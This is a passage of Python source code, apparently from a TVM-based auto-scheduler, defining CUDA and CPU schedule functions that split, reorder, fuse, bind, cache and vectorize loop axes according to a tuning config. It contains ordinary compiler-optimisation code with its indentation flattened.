outer, axis = s[op].split(axis, nparts=nparts[count])
tmp_buffer.append(outer)
tmp_buffer.append(axis)
splited_spatial_axes.append(tmp_buffer)
else:
for axis in spatial_axes:
splited_spatial_axes.append([axis])
assert_print(len(splited_spatial_axes) > 0, "empty spatial axes") # must be non-empty
# always reorder and fuse here
spatial_fuse_lsts = []
spatial_fuse_extents = []
reorder_lst = []
fused_spatial_axes = []
for count in range(len(splited_spatial_axes[0])):
tmp_buffer = [x[count] for x in splited_spatial_axes]
tmp_extent = reduce(lambda a, b: a * b, [x[count] for x in config["spatial"]])
spatial_fuse_lsts.append(tmp_buffer)
spatial_fuse_extents.append(tmp_extent)
reorder_lst.extend(tmp_buffer)
s[op].reorder(*reorder_lst)
for fuse_lst in spatial_fuse_lsts:
fused = s[op].fuse(*fuse_lst)
fused_spatial_axes.append(fused)
kernel_scope = fused_spatial_axes[0]
# always bind here
length = len(fused_spatial_axes)
thread_extents = 1
assert_print(length > 1, "fused axes length <= 1")
if 2 <= length <= 3:
s[op].bind(fused_spatial_axes[0], tvm.thread_axis("blockIdx.x"))
s[op].bind(fused_spatial_axes[1], tvm.thread_axis("threadIdx.x"))
thread_pos = fused_spatial_axes[1]
thread_extents = spatial_fuse_extents[1]
else:
s[op].bind(fused_spatial_axes[0], tvm.thread_axis("blockIdx.x"))
s[op].bind(fused_spatial_axes[1], tvm.thread_axis("vthread"))
s[op].bind(fused_spatial_axes[2], tvm.thread_axis("threadIdx.x"))
thread_pos = fused_spatial_axes[2]
thread_extents = spatial_fuse_extents[2]
# always compute at here
s[write_cache].compute_at(s[op], thread_pos)
# reduce_split
reduced_axes = s[write_cache].op.reduce_axis
splited_reduced_axes = []
if "reduce" in config and len(config["reduce"]) > 0:
# to align each axis
assert_print(len(config["reduce"]) == len(reduced_axes), "align reduce failed")
for axis, nparts in zip(reduced_axes, config["reduce"]):
tmp_buffer = []
for count in range(len(nparts) - 1):
outer, axis = s[write_cache].split(axis, nparts=nparts[count])
tmp_buffer.append(outer)
tmp_buffer.append(axis)
splited_reduced_axes.append(tmp_buffer)
else:
for axis in reduced_axes:
splited_reduced_axes.append([axis])
share_pos = None
local_pos = None
# if has reduce axes
if len(splited_reduced_axes) > 0:
# always reorder here
reduced_nonfuse_lsts = []
reorder_lst = []
length = len(splited_reduced_axes[0])
for count in range(length):
tmp_buffer = [x[count] for x in splited_reduced_axes]
reduced_nonfuse_lsts.append(tmp_buffer)
reorder_lst.extend(tmp_buffer)
# change the order of reduce axes and spatial axes
reorder_lst.extend(s[write_cache].op.axis)
s[write_cache].reorder(*reorder_lst)
if length == 1:
share_pos = reduced_nonfuse_lsts[-1][0]
else:
share_pos = reduced_nonfuse_lsts[-2][0]
local_pos = reduced_nonfuse_lsts[-1][-1]
# always cache read here
if share_pos is not None:
for share in read_cache_share_lst:
s[share].compute_at(s[write_cache], share_pos)
else:
for share in read_cache_share_lst:
s[share].compute_inline()
if local_pos is not None:
for local in read_cache_local_lst:
s[local].compute_at(s[write_cache], local_pos)
else:
for local in read_cache_local_lst:
s[local].compute_inline()
# always cooperative fetching
if share_pos is not None:
for share in read_cache_share_lst:
fuse_lst = s[share].op.axis
fused = s[share].fuse(*fuse_lst)
outer, inner = s[share].split(fused, nparts=thread_extents)
s[share].bind(outer, tvm.thread_axis("threadIdx.x"))
# unroll
if "unroll" in config and len(config["unroll"]) > 0:
step = config["unroll"][0][0]
explicit = config["unroll"][0][1]
s[op].pragma(kernel_scope, 'auto_unroll_max_step', step)
s[op].pragma(kernel_scope, 'unroll_explicit', explicit)
def _cuda_schedule_fuse_split(s, op, op_state):
# assert_print(op in s)
# always cache write here
# if op.num_outputs > 1:
# raise RuntimeWarning("Too many outputs in one operation!")
write_cache = s.cache_write(op.output(0), "local")
# always cache read here
read_cache_share_lst = []
# read_cache_local_lst = []
for t in op.input_tensors:
share = s.cache_read(t, "shared", [write_cache])
read_cache_share_lst.append(share)
# local = s.cache_read(share, "local", [write_cache])
# read_cache_local_lst.append(local)
# spatial fuse
spatial_axes = s[op].op.axis
fused_spatial_axes = []
if "fuse" in config and len(config["fuse"]) > 0:
# fuse redundant axes
beg = 0
for end in config["fuse"][0]:
fuse_lst = spatial_axes[beg:end]
beg = end
if len(fuse_lst) > 0:
fused = s[op].fuse(*fuse_lst)
fused_spatial_axes.append(fused)
else:
fused_spatial_axes = spatial_axes
# spatial split
split_factor_lst = []
splited_spatial_axes = []
if "spatial" in config and len(config["spatial"]) > 0:
# to align each axis
assert len(config["spatial"]) == len(spatial_axes), "align failed"
# compute split factors
if "fuse" in config and len(config["fuse"]) > 0:
beg = 0
for end in config["fuse"][0]:
tmp_lst = [1] * len(config["spatial"][0])
for i in range(beg, end):
for j in range(len(config["spatial"][i])):
tmp_lst[j] *= config["spatial"][i][j]
if beg < end:
split_factor_lst.append(tmp_lst)
beg = end
else:
split_factor_lst = config["spatial"]
assert len(fused_spatial_axes) == len(split_factor_lst), "align failed"
for axis, nparts in zip(fused_spatial_axes, split_factor_lst):
tmp_buffer = []
for count in range(len(nparts) - 1):
outer, axis = s[op].split(axis, nparts=nparts[count])
tmp_buffer.append(outer)
tmp_buffer.append(axis)
splited_spatial_axes.append(tmp_buffer)
else:
for axis in fused_spatial_axes:
splited_spatial_axes.append([axis])
assert len(splited_spatial_axes) > 0, "empty spatial axes" # must be non-empty
# always reorder here
reorder_lst = []
for count in range(len(splited_spatial_axes[0])):
tmp_buffer = [x[count] for x in splited_spatial_axes]
reorder_lst.extend(tmp_buffer)
s[op].reorder(*reorder_lst)
# fix kernel scope
kernel_scope = reorder_lst[0]
# always bind here
# - prepare thread axis
bx = tvm.thread_axis("blockIdx.x")
by = tvm.thread_axis("blockIdx.y")
bz = tvm.thread_axis("blockIdx.z")
vx = tvm.thread_axis("vthread")
vy = tvm.thread_axis("vthread")
vz = tvm.thread_axis("vthread")
tx = tvm.thread_axis("threadIdx.x")
ty = tvm.thread_axis("threadIdx.y")
tz = tvm.thread_axis("threadIdx.z")
blocks = [bz, by, bx]
threads = [tz, ty, tx]
vthreads = [vz, vy, vx]
block_extents = [-1, -1, -1] # z, y, x
virtual_extents = [-1, -1, -1]
thread_extents = [-1, -1, -1]
length = len(splited_spatial_axes)
assert length >= 1
# - bind
count = min(length, len(blocks)) - 1
while count >= 0:
parts = len(splited_spatial_axes[count])
assert parts > 0
if parts == 1:
s[op].bind(splited_spatial_axes[count][0], blocks[count])
block_extents[count] = split_factor_lst[count][0]
elif parts == 2:
s[op].bind(splited_spatial_axes[count][0], blocks[count])
block_extents[count] = split_factor_lst[count][0]
s[op].bind(splited_spatial_axes[count][1], threads[count])
thread_extents[count] = split_factor_lst[count][1]
else:
s[op].bind(splited_spatial_axes[count][0], blocks[count])
block_extents[count] = split_factor_lst[count][0]
s[op].bind(splited_spatial_axes[count][1], vthreads[count])
virtual_extents[count] = split_factor_lst[count][1]
s[op].bind(splited_spatial_axes[count][2], threads[count])
thread_extents[count] = split_factor_lst[count][2]
count -= 1
# - compute at pos
count = min(length, len(blocks)) - 1
parts = len(splited_spatial_axes[count])
thread_pos = splited_spatial_axes[count][min(parts - 1, 2)]
# always compute at here
s[write_cache].compute_at(s[op], thread_pos)
# reduce_split
reduced_axes = s[write_cache].op.reduce_axis
splited_reduced_axes = []
if "reduce" in config and len(config["reduce"]) > 0:
# to align each axis
assert_print(len(config["reduce"]) == len(reduced_axes), "align reduce failed")
for axis, nparts in zip(reduced_axes, config["reduce"]):
tmp_buffer = []
for count in range(len(nparts) - 1):
outer, axis = s[write_cache].split(axis, nparts=nparts[count])
tmp_buffer.append(outer)
tmp_buffer.append(axis)
splited_reduced_axes.append(tmp_buffer)
else:
for axis in reduced_axes:
splited_reduced_axes.append([axis])
share_pos = None
# local_pos = None
# if has reduce axes
if len(splited_reduced_axes) > 0:
# always reorder here
reduced_nonfuse_lsts = []
reorder_lst = []
length = len(splited_reduced_axes[0])
# leave the last part
for count in range(length - 1):
tmp_buffer = [x[count] for x in splited_reduced_axes]
reduced_nonfuse_lsts.append(tmp_buffer)
reorder_lst.extend(tmp_buffer)
# the last part
last_part = [x[length - 1] for x in splited_reduced_axes]
spatial_remainder = s[write_cache].op.axis
# change the order of reduce axes and spatial axes
if "reorder" in config and len(config["reorder"]) > 0:
pos = config["reorder"][0][0]
assert pos < len(spatial_remainder)
tmp_buffer = []
count = len(spatial_remainder) - 1
while count > pos:
tmp_buffer.append(spatial_remainder[count])
count -= 1
p = pos
q = len(last_part) - 1
while p >= 0 and q >= 0:
tmp_buffer.append(spatial_remainder[p])
tmp_buffer.append(last_part[q])
p -= 1
q -= 1
while p >= 0:
tmp_buffer.append(spatial_remainder[p])
p -= 1
while q >= 0:
tmp_buffer.append(last_part[q])
q -= 1
tmp_buffer = list(reversed(tmp_buffer))
reorder_lst.extend(tmp_buffer)
else:
reorder_lst.extend(last_part)
reorder_lst.extend(spatial_remainder)
s[write_cache].reorder(*reorder_lst)
# decide where to compute at
if length == 1:
share_pos = last_part[-1]
else:
mid = math.ceil(length / 2.0) - 1
share_pos = reduced_nonfuse_lsts[mid][-1]
# local_pos = last_part[-1]
# always cache read here
if share_pos is not None:
for share in read_cache_share_lst:
s[share].compute_at(s[write_cache], share_pos)
else:
for share in read_cache_share_lst:
s[share].compute_inline()
# if local_pos is not None:
# for local in read_cache_local_lst:
# s[local].compute_at(s[write_cache], local_pos)
# else:
# for local in read_cache_local_lst:
# s[local].compute_inline()
# always cooperative fetching
if share_pos is not None:
for share in read_cache_share_lst:
fuse_lst = s[share].op.axis
fused = s[share].fuse(*fuse_lst)
count = 2
cur = 1
limit = 1024
while count >= 0:
factor = thread_extents[count]
if factor < 0:
defined = False
factor = 16
else:
defined = True
cur *= factor
if not defined and cur > limit:
break
fused, inner = s[share].split(fused, factor=factor)
s[share].bind(inner, threads[count])
count -= 1
# unroll
if "unroll" in config and len(config["unroll"]) > 0:
step = config["unroll"][0][0]
explicit = config["unroll"][0][1]
s[op].pragma(kernel_scope, 'auto_unroll_max_step', step)
s[op].pragma(kernel_scope, 'unroll_explicit', explicit)
def _cuda_schedule_split_reorder_fuse(s, op, op_state):
# assert_print(op in s)
loop_lst = []
loop_idx = []
# always cache write here
# if op.num_outputs > 1:
# raise RuntimeWarning("Too many outputs in one operation!")
write_cache = s.cache_write(op.output(0), "local")
# always cache read here
read_cache_share_lst = []
# read_cache_local_lst = []
for t in op.input_tensors:
share = s.cache_read(t, "shared", [write_cache])
read_cache_share_lst.append(share)
# local = s.cache_read(share, "local", [write_cache])
# read_cache_local_lst.append(local)
# spatial split
spatial_axes = [axis for axis in s[op].op.axis]
assert len(spatial_axes) > 0, "empty spatial axes" # must be non-empty
n = spatial_axes[0]
kernel_scope, n = s[op].split(n, nparts=1)
spatial_axes[0] = n
splited_spatial_axes = []
splited_spatial_extents = []
if "spatial" in config and len(config["spatial"]) > 0:
# to align each axis
assert len(config["spatial"]) == len(spatial_axes), "align failed"
for axis, nparts in zip(spatial_axes, config["spatial"]):
tmp_buffer = []
tmp_extents = []
for count in range(len(nparts) - 1):
outer, axis = s[op].split(axis, nparts=nparts[count])
tmp_buffer.append(outer)
tmp_extents.append(nparts[count])
tmp_buffer.append(axis)
tmp_extents.append(nparts[-1])
splited_spatial_axes.append(tmp_buffer)
splited_spatial_extents.append(tmp_extents)
else:
for axis in spatial_axes:
splited_spatial_axes.append([axis])
splited_spatial_extents.append([axis.dom.extent.value])
# always reorder here
reorder_lst = []
reorder_parts = []
reorder_part_extents = []
for count in range(len(splited_spatial_axes[0])):
tmp_buffer = [x[count] for x in splited_spatial_axes]
tmp_extents = [x[count] for x in splited_spatial_extents]
reorder_lst.extend(tmp_buffer)
reorder_parts.append(tmp_buffer)
reorder_part_extents.append(tmp_extents)
s[op].reorder(*reorder_lst)
# handle fuse request
fused_parts = []
fused_part_extents = []
fused_part_idx = []
if "fuse" in config and len(config["fuse"]) > 0:
base_id = 0
for part, extents in zip(reorder_parts, reorder_part_extents):
tmp_part = []
tmp_extents = []
tmp_idx = []
idx = 0
beg = 0
for end in config["fuse"][0]:
if end - beg > 1:
fuse_lst = part[beg:end]
fused = s[op].fuse(*fuse_lst)
tmp_part.append(fused)
extent = reduce(lambda x, y: x * y, extents[beg:end], 1)
tmp_idx.extend([idx] * (end - beg))
idx += 1
tmp_extents.append(extent)
elif end - beg == 1:
tmp_part.append(part[beg])
tmp_extents.append(extents[beg])
tmp_idx.append(idx)
idx += 1
beg = end
fused_parts.append(tmp_part)
fused_part_extents.append(tmp_extents)
fused_part_idx.append(tmp_idx)
loop_lst.extend(tmp_part)
loop_idx.extend([x + base_id for x in tmp_idx])
base_id += len(tmp_part)
else:
fused_parts = reorder_parts
fused_part_extents = reorder_part_extents
fused_part_idx = [list(range(len(x))) for x in reorder_parts]
loop_lst = reorder_lst
loop_idx = list(range(len(reorder_lst)))
# record op state
op_state.loop_lst = loop_lst
op_state.loop_idx = loop_idx
# always bind here
# - prepare thread axis
bx = tvm.thread_axis("blockIdx.x")
by = tvm.thread_axis("blockIdx.y")
bz = tvm.thread_axis("blockIdx.z")
vx = tvm.thread_axis("vthread")
vy = tvm.thread_axis("vthread")
vz = tvm.thread_axis("vthread")
tx = tvm.thread_axis("threadIdx.x")
ty = tvm.thread_axis("threadIdx.y")
tz = tvm.thread_axis("threadIdx.z")
blocks = [bz, by, bx]
threads = [tz, ty, tx]
vthreads = [vz, vy, vx]
block_extents = [-1, -1, -1] # z, y, x
virtual_extents = [-1, -1, -1]
thread_extents = [-1, -1, -1]
bind_option = [None, None, None]
bind_candidate = [blocks, vthreads, threads]
candiate_extents = [block_extents, virtual_extents, thread_extents]
# - bind
num_parts = len(fused_parts)
if num_parts == 1:
bind_option[0] = (fused_parts[0], fused_part_extents[0])
local_pos = fused_parts[0][:len(bind_candidate[0])][-1]
elif num_parts == 2:
bind_option[0] = (fused_parts[0], fused_part_extents[0])
bind_option[2] = (fused_parts[1], fused_part_extents[1])
local_pos = fused_parts[1][:len(bind_candidate[2])][-1]
else:
bind_option[0] = (fused_parts[0], fused_part_extents[0])
bind_option[1] = (fused_parts[1], fused_part_extents[1])
bind_option[2] = (fused_parts[2], fused_part_extents[2])
local_pos = fused_parts[2][:len(bind_candidate[2])][-1]
for option, candidate, extents in zip(bind_option, bind_candidate, candiate_extents):
if option is not None:
for i, axis in enumerate(option[0][:len(candidate)]):
s[op].bind(axis, candidate[i])
extents[i] = option[1][i]
# compute at
if "local_pos" in config and len(config["local_pos"]) > 0:
local_at_part = config["local_pos"][0][0]
local_at_idx = config["local_pos"][0][1]
# index changed because of fusion
cur_idx = fused_part_idx[local_at_part][local_at_idx]
local_pos = fused_parts[local_at_part][cur_idx]
# always compute at here
s[write_cache].compute_at(s[op], local_pos)
# reduce_split
reduced_axes = s[write_cache].op.reduce_axis
splited_reduced_axes = []
if "reduce" in config and len(config["reduce"]) > 0:
# to align each axis
assert_print(len(config["reduce"]) == len(reduced_axes), "align reduce failed")
for axis, nparts in zip(reduced_axes, config["reduce"]):
tmp_buffer = []
for count in range(len(nparts) - 1):
outer, axis = s[write_cache].split(axis, nparts=nparts[count])
tmp_buffer.append(outer)
tmp_buffer.append(axis)
splited_reduced_axes.append(tmp_buffer)
else:
for axis in reduced_axes:
splited_reduced_axes.append([axis])
share_pos = None
# local_pos = None
# if has reduce axes
if len(splited_reduced_axes) > 0:
# always reorder here
reduced_nonfuse_lsts = []
reorder_lst = []
length = len(splited_reduced_axes[0])
# leave the last part
for count in range(length - 1):
tmp_buffer = [x[count] for x in splited_reduced_axes]
reduced_nonfuse_lsts.append(tmp_buffer)
reorder_lst.extend(tmp_buffer)
# the last part
last_part = [x[length - 1] for x in splited_reduced_axes]
spatial_remainder = s[write_cache].op.axis
# change the order of reduce axes and spatial axes
if "reorder" in config and len(config["reorder"]) > 0:
pos = config["reorder"][0][0]
assert pos < len(spatial_remainder)
tmp_buffer = []
count = len(spatial_remainder) - 1
while count > pos:
tmp_buffer.append(spatial_remainder[count])
count -= 1
p = pos
q = len(last_part) - 1
while p >= 0 and q >= 0:
tmp_buffer.append(spatial_remainder[p])
tmp_buffer.append(last_part[q])
p -= 1
q -= 1
while p >= 0:
tmp_buffer.append(spatial_remainder[p])
p -= 1
while q >= 0:
tmp_buffer.append(last_part[q])
q -= 1
tmp_buffer = list(reversed(tmp_buffer))
reorder_lst.extend(tmp_buffer)
else:
reorder_lst.extend(last_part)
reorder_lst.extend(spatial_remainder)
s[write_cache].reorder(*reorder_lst)
# decide where to compute at
if "share_pos" in config and len(config["share_pos"]) > 0:
share_at = config["share_pos"][0][0]
share_idx = config["share_pos"][0][1]
reduced_nonfuse_lsts.append(last_part)
share_pos = reduced_nonfuse_lsts[share_at][share_idx]
else:
if length == 1:
share_pos = last_part[-1]
else:
mid = math.ceil(length / 2.0) - 1
share_pos = reduced_nonfuse_lsts[mid][-1]
# local_pos = last_part[-1]
# always cache read here
if share_pos is not None:
for share in read_cache_share_lst:
s[share].compute_at(s[write_cache], share_pos)
else:
for share in read_cache_share_lst:
s[share].compute_inline()
# if local_pos is not None:
# for local in read_cache_local_lst:
# s[local].compute_at(s[write_cache], local_pos)
# else:
# for local in read_cache_local_lst:
# s[local].compute_inline()
# always cooperative fetching
if share_pos is not None:
for share in read_cache_share_lst:
fuse_lst = s[share].op.axis
fused = s[share].fuse(*fuse_lst)
count = 2
cur = 1
limit = 1024
while count >= 0:
factor = thread_extents[count]
if factor < 0:
defined = False
factor = 16
else:
defined = True
cur *= factor
if not defined and cur > limit:
break
fused, inner = s[share].split(fused, factor=factor)
s[share].bind(inner, threads[count])
count -= 1
# unroll
if "unroll" in config and len(config["unroll"]) > 0:
step = config["unroll"][0][0]
explicit = config["unroll"][0][1]
s[op].pragma(kernel_scope, 'auto_unroll_max_step', step)
s[op].pragma(kernel_scope, 'unroll_explicit', explicit)
def _cpu_schedule_split_fuse(s, op, op_state):
# always cache write here
# if op.num_outputs > 1:
# raise RuntimeWarning("Too many outputs in one operation!")
write_cache = s.cache_write(op.output(0), "global")
# spatial split
spatial_axes = s[op].op.axis
splited_spatial_axes = []
if "spatial" in config and len(config["spatial"]) > 0:
# to align each axis
assert_print(len(config["spatial"]) == len(spatial_axes), "align failed")
for axis, nparts in zip(spatial_axes, config["spatial"]):
tmp_buffer = []
for count in range(len(nparts) - 1):
outer, axis = s[op].split(axis, nparts=nparts[count])
tmp_buffer.append(outer)
tmp_buffer.append(axis)
splited_spatial_axes.append(tmp_buffer)
else:
for axis in spatial_axes:
splited_spatial_axes.append([axis])
assert_print(len(splited_spatial_axes) > 0, "empty spatial axes") # must be non-empty
# always reorder and fuse here
spatial_fuse_lsts = []
spatial_fuse_extents = []
reorder_lst = []
fused_spatial_axes = []
for count in range(len(splited_spatial_axes[0])):
tmp_buffer = [x[count] for x in splited_spatial_axes]
tmp_extent = reduce(lambda a, b: a * b, [x[count] for x in config["spatial"]])
spatial_fuse_lsts.append(tmp_buffer)
spatial_fuse_extents.append(tmp_extent)
reorder_lst.extend(tmp_buffer)
s[op].reorder(*reorder_lst)
for fuse_lst in spatial_fuse_lsts:
fused = s[op].fuse(*fuse_lst)
fused_spatial_axes.append(fused)
kernel_scope = fused_spatial_axes[0]
# always parallel here
length = len(fused_spatial_axes)
assert_print(length > 0, "empty spatial axes!")
s[op].parallel(fused_spatial_axes[0])
if length == 1:
thread_pos = fused_spatial_axes[0]
if 2 <= length <= 3:
thread_pos = fused_spatial_axes[1]
else:
thread_pos = fused_spatial_axes[2]
# always compute at here
s[write_cache].compute_at(s[op], thread_pos)
# reduce_split
reduced_axes = s[write_cache].op.reduce_axis
splited_reduced_axes = []
if "reduce" in config and len(config["reduce"]) > 0:
# to align each axis
assert_print(len(config["reduce"]) == len(reduced_axes), "align reduce failed")
for axis, nparts in zip(reduced_axes, config["reduce"]):
tmp_buffer = []
for count in range(len(nparts) - 1):
outer, axis = s[write_cache].split(axis, nparts=nparts[count])
tmp_buffer.append(outer)
tmp_buffer.append(axis)
splited_reduced_axes.append(tmp_buffer)
else:
for axis in reduced_axes:
splited_reduced_axes.append([axis])
# if has reduce axes
if len(splited_reduced_axes) > 0:
# always reorder here
reduced_nonfuse_lsts = []
reorder_lst = []
length = len(splited_reduced_axes[0])
for count in range(length):
tmp_buffer = [x[count] for x in splited_reduced_axes]
reduced_nonfuse_lsts.append(tmp_buffer)
reorder_lst.extend(tmp_buffer)
# change the order of reduce axes and spatial axes
rlength = len(splited_reduced_axes)
if rlength > 1:
reorder_lst.extend(s[write_cache].op.axis)
elif rlength == 1: # in this case, have to interleave otherwise the reorder is of no use
tmp_order = []
p_spatial = len(s[write_cache].op.axis) - 1
p_reduce = len(reorder_lst) - 1
while p_spatial >= 0 and p_reduce >= 0:
tmp_order.append(s[write_cache].op.axis[p_spatial])
tmp_order.append(reorder_lst[p_reduce])
p_spatial -= 1
p_reduce -= 1
while p_spatial >= 0:
tmp_order.append(s[write_cache].op.axis[p_spatial])
p_spatial -= 1
while p_reduce >= 0:
tmp_order.append(reorder_lst[p_reduce])
p_reduce -= 1
tmp_order = list(reversed(tmp_order))
reorder_lst = tmp_order
s[write_cache].reorder(*reorder_lst)
# unroll
if "unroll" in config and len(config["unroll"]) > 0:
step = config["unroll"][0][0]
s[op].pragma(kernel_scope, 'auto_unroll_max_step', step)
# always vectorize here
s[write_cache].vectorize(s[write_cache].op.axis[-1])
def _cpu_schedule_split_reorder_fuse(s, op, op_state):
# assert_print(op in s)
loop_idx = []
loop_lst = []
# always cache write here
# if op.num_outputs > 1:
# raise RuntimeWarning("Too many outputs in one operation!")
write_cache = s.cache_write(op.output(0), "local")
# spatial split
spatial_axes = [axis for axis in s[op].op.axis]
assert len(spatial_axes) > 0, "empty spatial axes" # must be non-empty
n = spatial_axes[0]
kernel_scope, n = s[op].split(n, nparts=1)
spatial_axes[0] = n
splited_spatial_axes = []
splited_spatial_extents = []
if "spatial" in config and len(config["spatial"]) > 0:
# to align each axis
assert len(config["spatial"]) == len(spatial_axes), "align failed"
for axis, nparts in zip(spatial_axes, config["spatial"]):
tmp_buffer = []
tmp_extents = []
for count in range(len(nparts) - 1):
outer, axis = s[op].split(axis, nparts=nparts[count])
tmp_buffer.append(outer)
tmp_extents.append(nparts[count])
tmp_buffer.append(axis)
tmp_extents.append(nparts[-1])
splited_spatial_axes.append(tmp_buffer)
splited_spatial_extents.append(tmp_extents)
else:
for axis in spatial_axes:
splited_spatial_axes.append([axis])
splited_spatial_extents.append([axis.dom.extent.value])
# always reorder here
reorder_lst = []
reorder_parts = []
reorder_part_extents = []
for count in range(len(splited_spatial_axes[0])):
tmp_buffer = [x[count] for x in splited_spatial_axes]
tmp_extents = [x[count] for x in splited_spatial_extents]
reorder_lst.extend(tmp_buffer)
reorder_parts.append(tmp_buffer)
reorder_part_extents.append(tmp_extents)
s[op].reorder(*reorder_lst)
# handle fuse request
fused_parts = []
fused_part_extents = []
fused_part_idx = []
if "fuse" in config and len(config["fuse"]) > 0:
base_id = 0
for part, extents in zip(reorder_parts, reorder_part_extents):
tmp_part = []
tmp_extents = []
tmp_idx = []
idx = 0
beg = 0
for end in config["fuse"][0]:
if end - beg > 1:
fuse_lst = part[beg:end]
fused = s[op].fuse(*fuse_lst)
tmp_part.append(fused)
extent = reduce(lambda x, y: x * y, extents[beg:end], 1)
tmp_idx.extend([idx] * (end - beg))
idx += 1
tmp_extents.append(extent)
elif end - beg == 1:
tmp_part.append(part[beg])
tmp_extents.append(extents[beg])
tmp_idx.append(idx)
idx += 1
beg = end
fused_parts.append(tmp_part)
fused_part_extents.append(tmp_extents)
fused_part_idx.append(tmp_idx)
# for op state
loop_lst.extend(tmp_part)
loop_idx.extend([x + base_id for x in tmp_idx])
base_id += len(tmp_part)
else:
fused_parts = reorder_parts
fused_part_extents = reorder_part_extents
fused_part_idx = [list(range(len(x))) for x in reorder_parts]
# for op state
loop_lst = reorder_lst
loop_idx = list(range(len(reorder_lst)))
# record op state
op_state.loop_lst = loop_lst
op_state.loop_idx = loop_idx
# parallel
fused = s[op].fuse(*fused_parts[0])
s[op].parallel(fused)
# compute at
num_parts = len(fused_parts)
if num_parts == 1:
local_pos = fused
elif num_parts == 2:
local_pos = fused_parts[num_parts - 1][0]
else:
local_pos = fused_parts[num_parts - 2][-1]
if "local_pos" in config and len(config["local_pos"]) > 0:
local_at_part = config["local_pos"][0][0]
local_at_idx = config["local_pos"][0][1]
# index changed because of fusion
cur_idx = fused_part_idx[local_at_part][local_at_idx]
local_pos = fused_parts[local_at_part][cur_idx]
# always compute at here
s[write_cache].compute_at(s[op], local_pos)
# reduce_split
reduced_axes = s[write_cache].op.reduce_axis
splited_reduced_axes = []
if "reduce" in config and len(config["reduce"]) > 0:
# to align each axis
assert_print(len(config["reduce"]) == len(reduced_axes), "align reduce failed")
for axis, nparts in zip(reduced_axes, config["reduce"]):
tmp_buffer = []
for count in range(len(nparts) - 1):
outer, axis = s[write_cache].split(axis, nparts=nparts[count])
tmp_buffer.append(outer)
tmp_buffer.append(axis)
splited_reduced_axes.append(tmp_buffer)
else:
for axis in reduced_axes:
splited_reduced_axes.append([axis])
# if has reduce axes
if len(splited_reduced_axes) > 0:
# always reorder here
reduced_nonfuse_lsts = []
reorder_lst = []
length = len(splited_reduced_axes[0])
# leave the last part
for count in range(length - 1):
tmp_buffer = [x[count] for x in splited_reduced_axes]
reduced_nonfuse_lsts.append(tmp_buffer)
reorder_lst.extend(tmp_buffer)
# the last part
last_part = [x[length - 1] for x in splited_reduced_axes]
spatial_remainder = s[write_cache].op.axis
# change the order of reduce axes and spatial axes
if "reorder" in config and len(config["reorder"]) > 0:
pos = config["reorder"][0][0]
assert pos < len(spatial_remainder)
tmp_buffer = []
count = len(spatial_remainder) - 1
while count > pos:
tmp_buffer.append(spatial_remainder[count])
count -= 1
p = pos
q = len(last_part) - 1
while p >= 0 and q >= 0:
tmp_buffer.append(spatial_remainder[p])
tmp_buffer.append(last_part[q])
p -= 1
q -= 1
while p >= 0:
tmp_buffer.append(spatial_remainder[p])
p -= 1
while q >= 0:
tmp_buffer.append(last_part[q])
q -= 1
tmp_buffer = list(reversed(tmp_buffer))
reorder_lst.extend(tmp_buffer)
else:
reorder_lst.extend(last_part)
reorder_lst.extend(spatial_remainder)
s[write_cache].reorder(*reorder_lst)
# unroll
if "unroll" in config and len(config["unroll"]) > 0:
step = config["unroll"][0][0]
explicit = config["unroll"][0][1]
s[op].pragma(kernel_scope, 'auto_unroll_max_step', step)
s[op].pragma(kernel_scope, 'unroll_explicit', explicit)
def _cpu_schedule_simple(s, op, op_state):
# always cache write here
# if op.num_outputs > 1:
# raise RuntimeWarning("Too many outputs in one operation!")
write_cache = s.cache_write(op.output(0), "global")
# spatial split
spatial_axes = s[op].op.axis
splited_spatial_axes = []
if "spatial" in config and len(config["spatial"]) > 0:
# to align each axis
assert_print(len(config["spatial"]) == len(spatial_axes), "align failed")
for axis, nparts in zip(spatial_axes, config["spatial"]):
nfactors = [1]
count = len(nparts) - 1
while count >= 0:
nfactors.append(nparts[count] * nfactors[-1])
count -= 1
tmp_buffer = []
num_factors = len(nfactors)
for i in range(num_factors - 2):
factor = nfactors[num_factors - 2 - i]
part = nparts[i]
if factor == 1:
tmp_buffer.append(axis)
axis = None
elif part == 1:
tmp_buffer.append(None)
else:
outer, axis = s[op].split(axis, factor=factor)
tmp_buffer.append(outer)
tmp_buffer.append(axis)
splited_spatial_axes.append(tmp_buffer)
else:
for axis in spatial_axes:
splited_spatial_axes.append([axis])
assert_print(len(splited_spatial_axes) > 0, "empty spatial axes") # must be non-empty
# always reorder and fuse here
# this part actually suppose there is "spatial" in config
# which is avoidable
spatial_fuse_lsts = []
spatial_fuse_extents = []
reorder_lst = []
fused_spatial_axes = []
spatial_split_num_parts = len(splited_spatial_axes[0])
for count in range(spatial_split_num_parts):
tmp_buffer = [x[count] for x in splited_spatial_axes]
tmp_extent = reduce(lambda a, b: a * b, [x[count] for x in config["spatial"]])
spatial_fuse_lsts.append(tmp_buffer)
spatial_fuse_extents.append(tmp_extent)
reorder_lst.extend(tmp_buffer)
reorder_lst_without_none = list(filter(lambda x: x is not None, reorder_lst))
# print("reorder op", reorder_lst_without_none)
s[op].reorder(*reorder_lst_without_none)
for fuse_lst in spatial_fuse_lsts[:1]:
tmp_buffer = list(filter(lambda x: x is not None, fuse_lst))
# print("fuse op", tmp_buffer)
fused = s[op].fuse(*tmp_buffer)
fused_spatial_axes.append(fused)
kernel_scope = fused_spatial_axes[0]
if len(spatial_fuse_lsts) > 1:
count = 0
while config["spatial"][count][1] == 1:
count += 1
next_pos_for_comptue_at = spatial_fuse_lsts[1][count]
else:
next_pos_for_comptue_at = kernel_scope
# always parallel here
s[op].parallel(kernel_scope)
# vectorize
if len(spatial_fuse_lsts) == 2:
count = len(spatial_fuse_lsts[1]) - 1
while count >= 1:
if spatial_fuse_lsts[1][count] is not None and config["spatial"][1][count] > 1:
# print("vectorize op", spatial_fuse_lsts[1][count])
s[op].vectorize(spatial_fuse_lsts[1][count])
break
count -= 1
elif len(spatial_fuse_lsts) > 2:
count = len(spatial_fuse_lsts[-1]) - 1
while count >= 0:
if spatial_fuse_lsts[-1][count] is not None and config["spatial"][count][-1] > 1:
# print("vectorize op", spatial_fuse_lsts[-1][count])
s[op].vectorize(spatial_fuse_lsts[-1][count])
break
count -= 1
# always compute at here
# print("compute at", next_pos_for_comptue_at)
s[write_cache].compute_at(s[op], next_pos_for_comptue_at)
# spatial_split for write cache
spatial_axes = s[write_cache].op.axis
num_spatial_axes = len(spatial_axes)
splited_spatial_axes = []
if "spatial" in config and len(config["spatial"]) > 0:
# to align each axis
